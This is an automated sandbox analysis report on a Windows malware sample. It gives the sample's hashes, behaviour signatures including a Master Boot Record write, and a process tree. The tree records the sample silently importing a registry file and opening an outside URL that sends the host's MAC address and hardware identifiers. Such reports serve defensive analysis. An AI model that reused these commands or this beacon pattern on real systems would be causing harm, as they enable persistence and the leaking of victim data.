Analysis

  • max time kernel
    0s
  • max time network
    33s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/10/2024, 14:49

General

  • Target

    835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe

  • Size

    60KB

  • MD5

    835759aebbd9d2ac10b6e7ae25b7e8d3

  • SHA1

    d47d1d378c9b20dc3ce2e5c202fa9f8478e06b98

  • SHA256

    02cd7c84b903401c79912c13872510517779077cf3b4dfb683e2d01b3a48fae2

  • SHA512

    3da4c02fe8d48336497ca4a0c1c8a29b9c081ac10cd6540948f2595268febb36de5fbd092a708a0173c624c24b1a129529786695ea462bca20e2cb53a47d3cf2

  • SSDEEP

    768:TED6ScJar0b01CamqZHKyKMB4Rn2iYkHj1WBw/N5bMzPRd/UIKJyFd/k:QcJar0O5m6eD1Wu07UuFdc

Malware Config

Signatures

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4488
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:752
      • C:\Windows\SysWOW64\regedit.exe
        regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
        3⤵
        • Runs .reg file with regedit
        PID:1588
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://union.wanwan.cc/Stat.ashx?Mac=CA65FB447FB&Hard=232138804165&ClientType=Home&Process=88&UserID=0017&Authen=758-727
      2⤵
        PID:3300
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3300 CREDAT:17410 /prefetch:2
          3⤵
            PID:1520

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\getback.reg

              Filesize

              1KB

              MD5

              626e2d76f5c328d57a3eff6a7f94d129

              SHA1

              210fd33fa005775b30a8fd40a065a2e788934216

              SHA256

              5d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e

              SHA512

              629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1

            • memory/4488-0-0x0000000000400000-0x000000000040F000-memory.dmp

              Filesize

              60KB

            • memory/4488-13-0x0000000000400000-0x000000000040F000-memory.dmp

              Filesize

              60KB